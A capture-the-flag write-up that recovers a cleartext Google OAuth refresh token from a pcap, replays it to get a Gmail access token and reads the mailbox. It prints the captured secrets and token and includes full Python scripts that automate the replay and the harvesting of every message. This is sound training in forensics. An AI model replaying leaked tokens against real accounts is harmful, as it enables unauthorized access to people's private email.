listening? was one of the forensics challenges in FwordCTF 2021.
The challenge description reads:
How Deep Can You Possibly Dig?
Flag Format: FwordCTF{....}
We are given a pcap file, challenge.pcap.
It is a small trace lasting almost 9 seconds and containing 66 packets: DNS, ARP and ICMP traffic plus a single HTTP connection. That HTTP connection is the interesting part, since it is unencrypted HTTP to oauth2.googleapis.com. Following the TCP stream gives:
REQUEST - packet 19
POST /token HTTP/1.1
Host: oauth2.googleapis.com
Content-length: 269
content-type: application/x-www-form-urlencoded
user-agent: google-oauth-playground
client_secret=AER8VvrXuFfYfqjhidcekAM0&grant_type=refresh_token&refresh_token=1%2F%2F044y6gZR87Kl0CgYIARAAGAQSNwF-L9IrkAFpIJPMhiGY0OPJpo5RiA5_7R-mHH-kuHwCMUeFL2JqxevGr23oBJmaxdnrD52t3X4&client_id=1097638694557-3v745luessc34bkoiqkf8tndqgvbqjpm.apps.googleusercontent.com&[email protected]
RESPONSE - packet 33
HTTP/1.1 403 Forbidden
Vary: X-Origin
Vary: Referer
Content-Type: application/json; charset=UTF-8
Date: Fri, 27 Aug 2021 18:24:31 GMT
Server: scaffolding on HTTPServer2
Cache-Control: private
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Accept-Ranges: none
Vary: Origin,Accept-Encoding
Transfer-Encoding: chunked
{
"error": {
"code": 403,
"message": "SSL is required to perform this operation.",
"status": "PERMISSION_DENIED"
}
}
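Before replaying anything it is worth pulling the form fields out of the captured body, because the refresh_token is URL-encoded in the capture (1%2F%2F...) and has to be decoded before it can be reused. The script below is an added example, not part of the original writeup: it takes the request text of packet 19 as you would copy it from Wireshark's Follow TCP Stream (constructed here inline; the final form pair is redacted in the writeup and the Content-length header is dropped for that reason), flags it as a cleartext token refresh and returns the decoded OAuth parameters.

```python
from urllib.parse import parse_qs

# Request text of packet 19, constructed from the writeup. The last form
# pair is redacted on the page, so it is left out, and Content-length is
# omitted because it would no longer match the shortened body.
CAPTURED_REQUEST = (
    "POST /token HTTP/1.1\r\n"
    "Host: oauth2.googleapis.com\r\n"
    "content-type: application/x-www-form-urlencoded\r\n"
    "user-agent: google-oauth-playground\r\n"
    "\r\n"
    "client_secret=AER8VvrXuFfYfqjhidcekAM0&grant_type=refresh_token"
    "&refresh_token=1%2F%2F044y6gZR87Kl0CgYIARAAGAQSNwF-L9IrkAFpIJPMhiGY0OPJpo5RiA5_7R-mHH-kuHwCMUeFL2JqxevGr23oBJmaxdnrD52t3X4"
    "&client_id=1097638694557-3v745luessc34bkoiqkf8tndqgvbqjpm.apps.googleusercontent.com"
)


def split_http_request(raw):
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # header names are case-insensitive
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def is_plaintext_token_refresh(req):
    """True when the request is an OAuth2 token grant to Google's token
    endpoint; any such request seen in a pcap was sent without TLS."""
    h = req["headers"]
    return (req["method"] == "POST"
            and req["path"] == "/token"
            and h.get("host") == "oauth2.googleapis.com"
            and "x-www-form-urlencoded" in h.get("content-type", ""))


def oauth_params(body):
    """URL-decode the form body into a flat dict (first value per key)."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def leaked_grant(raw):
    """Return the decoded grant parameters, or None if this is not one."""
    req = split_http_request(raw)
    if not is_plaintext_token_refresh(req):
        return None
    params = oauth_params(req["body"])
    if params.get("grant_type") != "refresh_token":
        return None
    return params


if __name__ == "__main__":
    for k, v in leaked_grant(CAPTURED_REQUEST).items():
        print(f"{k} = {v}")
```

The decoded refresh_token starts with 1// (not 1%2F%2F), which is the value used in the replay that follows.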
The server rejected the request because it arrived over plaintext HTTP rather than TLS. What matters for us is that the client sent a complete refresh_token grant (client_id, client_secret and refresh_token) in the clear, and a refresh token stays valid until it is revoked, so we can simply replay the same POST to the token endpoint over HTTPS (port 443):
https://oauth2.googleapis.com/token
client_secret=AER8VvrXuFfYfqjhidcekAM0
grant_type=refresh_token
refresh_token=1//044y6gZR87Kl0CgYIARAAGAQSNwF-L9IrkAFpIJPMhiGY0OPJpo5RiA5_7R-mHH-kuHwCMUeFL2JqxevGr23oBJmaxdnrD52t3X4
client_id=1097638694557-3v745luessc34bkoiqkf8tndqgvbqjpm.apps.googleusercontent.com
[email protected]
This gives us a fresh access token, scoped to gmail.readonly, which is all we need. (A refresh token leaked like this should be revoked; Google exposes https://oauth2.googleapis.com/revoke for that.)
{
"access_token": "ya29.a0ARrdaM9n2idPYv8nnNVnR5gqL_T47o0Q0XKYvIbB8IEzgHo8Ykus3fi2K5vc5A0xMU_liwsiFVEAJQKbQrxEIMAXTRO2HYUG_aNFu9NhmZQwQTH-v4-rxQ3qP7XowFYTCzyXf7cfj-E8q-TGZ-y_uW9JONuMQA",
"expires_in": 3599,
"scope": "https://www.googleapis.com/auth/gmail.readonly",
"token_type": "Bearer"
}
Now we can send a GET request to https://gmail.googleapis.com/gmail/v1/users/{userId}/messages with an Authorization: Bearer header carrying the token retrieved above, in order to get the IDs of the messages in the user's mailbox. The userId is the account's address ([email protected] in the capture), or simply me for the account the token belongs to.
{
"messages": [
{
"id": "17b896f6726974e0",
"threadId": "17b896f6726974e0"
},
{
"id": "17b88c3eac07ae5e",
"threadId": "17b88c3eac07ae5e"
},
{
"id": "17b87ba8cb2223ae",
"threadId": "17b87ba8cb2223ae"
},
{
"id": "17b87ba704382ed8",
"threadId": "17b87ba704382ed8"
},
{
"id": "17b7e34d7c2c32ab",
"threadId": "17b7e34d7c2c32ab"
},
{
"id": "17b7e18804f074a3",
"threadId": "17b7e18804f074a3"
},
{
"id": "17b7e09ebbf28050",
"threadId": "17b7e09ebbf28050"
},
{
"id": "17b7da2b72dab49b",
"threadId": "17b7da203f30dacd"
},
{
"id": "17b7da27c90003dc",
"threadId": "17b7da27c90003dc"
},
{
"id": "17b7da203f30dacd",
"threadId": "17b7da203f30dacd"
},
{
"id": "17b7d91845068c5e",
"threadId": "17b7d91845068c5e"
},
{
"id": "17b7d90a62a92cf7",
"threadId": "17b7d90a62a92cf7"
},
{
"id": "17b7d8fc93407e79",
"threadId": "17b7d8fc93407e79"
},
{
"id": "17b7d8ea201ede87",
"threadId": "17b7d8d5f2e72c65"
},
{
"id": "17b7d8dd6b16b6a1",
"threadId": "17b7d8d5f2e72c65"
},
{
"id": "17b7d8d5f2e72c65",
"threadId": "17b7d8d5f2e72c65"
},
{
"id": "17b7d8c607a05e7e",
"threadId": "17b7d8c607a05e7e"
},
{
"id": "17b7d85d21fc05ba",
"threadId": "17b7d85d21fc05ba"
},
{
"id": "17b7d762e4b0777e",
"threadId": "17b7d762e4b0777e"
}
],
"resultSizeEstimate": 19
}
We can now fetch each message from https://gmail.googleapis.com/gmail/v1/users/{userId}/messages/{id}. The body parts come back base64url-encoded and need decoding before searching them for the flag.
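The whole chain (replay the refresh grant over TLS, page through the message list, fetch every message and decode its base64url body parts until something matches the flag format) as one script. This is an added example, not the author's code: the network functions use only urllib and the token and Gmail endpoints named in the writeup, the grant parameters are the ones from the capture (long since useless outside the CTF), and SAMPLE_MESSAGE is a constructed message in the Gmail API's format=full shape so that the decoding and flag search can be exercised offline.

```python
import base64
import json
import re
from urllib.parse import urlencode
from urllib.request import Request, urlopen

TOKEN_URL = "https://oauth2.googleapis.com/token"
GMAIL_API = "https://gmail.googleapis.com/gmail/v1/users"
FLAG_RE = re.compile(r"FwordCTF\{[^}]*\}")

# Grant parameters recovered from the pcap (refresh_token already URL-decoded).
CAPTURED_GRANT = {
    "grant_type": "refresh_token",
    "client_id": "1097638694557-3v745luessc34bkoiqkf8tndqgvbqjpm.apps.googleusercontent.com",
    "client_secret": "AER8VvrXuFfYfqjhidcekAM0",
    "refresh_token": "1//044y6gZR87Kl0CgYIARAAGAQSNwF-L9IrkAFpIJPMhiGY0OPJpo5RiA5_7R-mHH-kuHwCMUeFL2JqxevGr23oBJmaxdnrD52t3X4",
}


def refresh_access_token(grant):
    """Replay the captured refresh_token grant over TLS; returns the token JSON."""
    req = Request(TOKEN_URL, data=urlencode(grant).encode(), method="POST",
                  headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urlopen(req) as resp:
        return json.load(resp)


def gmail_get(access_token, path):
    """GET a Gmail API resource with the bearer token and parse the JSON."""
    req = Request(f"{GMAIL_API}/{path}",
                  headers={"Authorization": f"Bearer {access_token}"})
    with urlopen(req) as resp:
        return json.load(resp)


def list_message_ids(access_token, user_id="me"):
    """Follow nextPageToken so mailboxes larger than one page are covered."""
    ids, page = [], None
    while True:
        path = f"{user_id}/messages" + (f"?pageToken={page}" if page else "")
        result = gmail_get(access_token, path)
        ids.extend(m["id"] for m in result.get("messages", []))
        page = result.get("nextPageToken")
        if not page:
            return ids


def b64url_decode(data):
    """Gmail strips the '=' padding from body.data; restore it before decoding."""
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def message_texts(message):
    """Decoded text of every body part (multipart messages nest in 'parts'),
    plus the snippet, which is plain text."""
    texts = []
    stack = [message.get("payload", {})]
    while stack:
        part = stack.pop()
        data = part.get("body", {}).get("data")
        if data:
            texts.append(b64url_decode(data).decode("utf-8", "replace"))
        stack.extend(part.get("parts", []))
    texts.append(message.get("snippet", ""))
    return texts


def find_flag(message):
    """First FwordCTF{...} string in any decoded part of the message, or None."""
    for text in message_texts(message):
        m = FLAG_RE.search(text)
        if m:
            return m.group(0)
    return None


def hunt(access_token, user_id="me"):
    """Fetch every message in full and stop at the first one containing a flag."""
    for mid in list_message_ids(access_token, user_id):
        msg = gmail_get(access_token, f"{user_id}/messages/{mid}?format=full")
        flag = find_flag(msg)
        if flag:
            return mid, flag
    return None


def _b64url(text):
    return base64.urlsafe_b64encode(text.encode()).decode().rstrip("=")


# Constructed sample (not real mailbox data) in the shape returned by
# messages.get?format=full, with the flag hidden in the text/plain part.
SAMPLE_MESSAGE = {
    "id": "17b7d85d21fc05ba",
    "snippet": "see below",
    "payload": {
        "mimeType": "multipart/alternative",
        "parts": [
            {"mimeType": "text/plain",
             "body": {"data": _b64url("flag: FwordCTF{email_forensics_is_interesting_73489nn7n4891}")}},
            {"mimeType": "text/html",
             "body": {"data": _b64url("<p>nothing to see here</p>")}},
        ],
    },
}

if __name__ == "__main__":
    token = refresh_access_token(CAPTURED_GRANT)["access_token"]
    print(hunt(token))
```

Only find_flag and the decoding helpers run offline; hunt and refresh_access_token need network access and a grant that is still valid.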
The flag is found in email ID 17b7d85d21fc05ba:
FwordCTF{email_forensics_is_interesting_73489nn7n4891}